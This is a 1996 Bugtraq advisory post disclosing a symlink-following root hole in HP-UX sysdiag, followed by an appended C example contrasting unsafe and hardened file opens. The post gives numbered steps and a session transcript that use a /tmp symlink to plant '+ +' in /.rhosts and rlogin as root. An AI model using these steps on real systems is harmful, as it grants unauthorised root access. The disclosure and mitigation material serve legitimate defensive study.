From proff  Wed Sep 25 15:02:23 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id PAA11853 for best-of-security; Wed, 25 Sep 1996 15:02:21 +1000
Received: (sendmail@localhost) by suburbia.net (8.7.4/Proff-950810) id HAA20118; Wed, 25 Sep 1996 07:17:03 +1000
Received: from UNKNOWN(128.148.157.143), claiming to be "brimstone.netspace.org"
 via SMTP by suburbia.net, id smtpd20114aaa; Tue Sep 24 21:16:14 1996
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <22906-20865>; Tue, 24 Sep 1996 17:05:43 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA29151; Tue, 24 Sep 1996 17:03:40 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 513049 for BUGTRAQ@NETSPACE.ORG; Tue, 24 Sep 1996 16:55:31
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id PAA22015 for <BUGTRAQ@NETSPACE.ORG>; Tue,
          24 Sep 1996 15:47:24 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from nova.umuc.edu (nova.umuc.edu [131.171.11.11]) by netspace.org
          (8.7/8.6.12) with ESMTP id XAA30635 for <bugtraq@netspace.org>; Sat,
          21 Sep 1996 23:59:50 -0400
Received:  from nova [131.171.11.11] ("nova") by nova.umuc.edu (8.7.6/16.2)
           with SMTP; id XAA16079 Sat, 21 Sep 1996 23:59:45 -0400 (EDT)
X-Mailer: Mozilla 3.0b6Gold (Win16; I)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Approved-By:  "John W. Jacobi" <jjacobi@POP500.GSFC.NASA.GOV>
Message-ID: <3244E32A.6093@pop500.gsfc.nasa.gov>
Date: 	Sat, 21 Sep 1996 23:56:42 -0700
Reply-To: jjacobi@pop500.gsfc.nasa.gov
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: "John W. Jacobi" <jjacobi@pop500.gsfc.nasa.gov>
Subject:      Vunerability in HP sysdiag ?
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Approved: proff@suburbia.net

Hi all,

If this is out, I apologize.

Subject: Vulnerability in HP sysdiag ???

Program and Systems that I did this on:
        The sysdiag program on
           HP 9000/700/HPUX9.05 (has PHSS_7587)
           HP 9000/800/HPUX9.04 (not sure of patch regarding diags)

To Prevent:
        For now, turn off the set uid on the programs involved.

This is how it worked for me, perhaps you too:

Problem:

        Basically, the sysdiag stuff is set-uid root.  You can exploit that
feature to create and write stuff to arbitrary files on the system as root,
while not being root.  If the target file you want to create exists, this
doesn't work.  Perhaps there is a way around that, but that ain't the point.
The point is that I used this to get root in 30 seconds on my HP's and that's
not good.  Heck, this is probably faster than asking for the root
password !!!

More on the problem:

        What happens is that a feature exists to create a log file of your
sysdiag session that can be invoked while in the program.  You give it the
name of the file to create, and if it is a sym link to a non-existent file,
sysdiag follows the sym link and creates the file as root for you and logs
your session in it.  To show a typical vulnerability, I created /.rhosts
from a sym link in /tmp that sysdiag followed and then caused sysdiag to
echo the line "+ +" into the file.  Then I could rlogin as root.

        If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick
to create and put a "+ +" in either of those files.  That's an easy way to
become root or someone else.  You can do other files as well.  This ain't
cool, at all...

How I tested this on my system:

1. I logged in with my regular account
2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
3. I ran the command: /bin/sysdiag
4. From the DUI> prompt I typed: outfile /tmp/f1
5. From the DUI> prompt I typed: + +
6. From the DUI> prompt I typed: redo
7. When my previous command echoed to the screen I pressed <return>.
8. From the DUI> prompt I typed: exit
9. Now at the shell prompt, and out of sysdiag, I typed:
        rlogin localhost -l root
10. Once logged in I typed: id
        and it said I was root...

This is the script of my sysdiag session:

Script started on Sat Sep 21 23:29:10 1996
$ id
uid=1648(jjacobi) gid=999(systems)
$ ls -l /tmp
total 0
$ ls -l /.rhosts
/.rhosts not found
$ ln -s /.rhosts /tmp/tempfile
$ ls -l /tmp
total 2
lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile -> /.rhosts
$ ls -l /.rhosts
/.rhosts not found
$ /bin/sysdiag
*****************************************************************
******                                                     ******
******               ONLINE DIAGNOSTIC SYSTEM              ******
******                                                     ******
******          (C) Copyright Hewlett Packard Co.          ******
******               1987, 1989, 1990, 1992                ******
******                 All Rights Reserved                 ******
******                                                     ******
******              DUI Version A.02.24                    ******
******         Diagnostic Monitor Version   A.02.19        ******
******                                                     ******
*****************************************************************

    Type "HELP" for assistance.

DUI >outfile /tmp/tempfile
DUI >+ +
     ^
*** SYNTAX ERROR (DUISERR 501)

DUI >redo
+ +

DUI >+ +
     ^
*** SYNTAX ERROR (DUISERR 501)

DUI >exit
$ ls -l /tmp
total 2
lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile -> /.rhosts
$ ls -l /.rhosts
-rw-------   1 root     systems      891 Sep 21 23:29 /.rhosts
$ id
uid=1648(jjacobi) gid=999(systems)
$ rlogin localhost -l root
Please wait...checking for disk quotas

Value of TERM has been set to "vt100".
# id
uid=0(root) gid=3(sys)
# cat /.rhosts
DUI >+
+

^
*** SYNTAX ERROR (DUISERR
501)

DUI
>redo
+
+
DUI >+
+

^
*** SYNTAX ERROR (DUISERR
501)

DUI
>exit
# exit
logout root
Connection closed.
$ id
uid=1648(jjacobi) gid=999(systems)
$ exit

script done on Sat Sep 21 23:30:38 1996

You have reached the end of my message, thank you for reading it.

John W. Jacobi
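The root cause described in the post is a setuid-root program that creates a user-named log file with a plain open(2), which follows a dangling symlink and so creates whatever file the link points at. The following C program is an added example, not code from the post and not HP's sysdiag source (which is not on the page); it reproduces the observed behaviour with a naive open, shows the hardened open a setuid program should use (O_CREAT|O_EXCL|O_NOFOLLOW plus an fstat check, optionally performed with the invoker's real uid), and runs both against a dangling symlink inside a scratch directory so nothing outside it is touched. The function names and the scratch-directory layout are assumptions made for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the post's "outfile" command evidently used: create the log if
 * absent, otherwise append. open(2) resolves the final path component through
 * a symlink, so a dangling link /tmp/x -> /.rhosts makes a root process create
 * /.rhosts. (Assumption: this reproduces the reported behaviour, not HP's code.) */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
}

/* Hardened version. With O_CREAT|O_EXCL, open(2) fails with EEXIST when the
 * last path component is a symlink, even a dangling one, so the process never
 * creates a file at a location chosen by the link. O_NOFOLLOW covers links that
 * already resolve. The fstat check rejects anything that is not a plain regular
 * file (for example a FIFO or a device node). */
int open_log_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

/* For a setuid program the stronger fix is to open user-supplied paths with the
 * invoker's identity, so the kernel's permission check runs as the real user
 * rather than root; the flags above stay as defence in depth. Returns fd or -1. */
int open_log_as_invoker(const char *path)
{
    uid_t saved = geteuid();
    if (seteuid(getuid()) != 0)
        return -1;
    int fd = open_log_safe(path);
    int saved_errno = errno;
    if (seteuid(saved) != 0) {      /* cannot regain privilege: fail closed */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* Reproduce the post's scenario in a scratch directory (constructed for this
 * example): a dangling symlink named like a log file pointing at a target that
 * does not yet exist. Returns 1 if the hardened open refuses and leaves the
 * target absent while the naive open creates it, 0 otherwise. */
int demo_dangling_symlink(void)
{
    char dir[] = "/tmp/sysdiag_demo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char linkpath[512], target[512];
    snprintf(linkpath, sizeof linkpath, "%s/tempfile", dir);
    snprintf(target, sizeof target, "%s/rhosts", dir);

    int ok = 0;
    struct stat st;
    if (symlink(target, linkpath) == 0) {
        /* Hardened open: must fail and must not create the target. */
        int fd = open_log_as_invoker(linkpath);
        int refused = (fd < 0 && (errno == EEXIST || errno == ELOOP));
        int still_absent = (lstat(target, &st) != 0 && errno == ENOENT);
        if (fd >= 0) close(fd);

        /* Naive open: follows the link and creates the target, as sysdiag did. */
        fd = open_log_unsafe(linkpath);
        int created = (fd >= 0 && lstat(target, &st) == 0 && S_ISREG(st.st_mode));
        if (fd >= 0) close(fd);

        ok = refused && still_absent && created;
    }
    unlink(target);
    unlink(linkpath);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("hardened open refused the dangling link, naive open followed it: %s\n",
           demo_dangling_symlink() ? "yes" : "no");
    return 0;
}
```

The O_EXCL behaviour on symlinks is specified by POSIX and implemented by Linux and HP-UX alike, which is why it, rather than a lstat-then-open race-prone check, is the usual fix; dropping to the real uid before the open is what removes the privilege from the operation altogether.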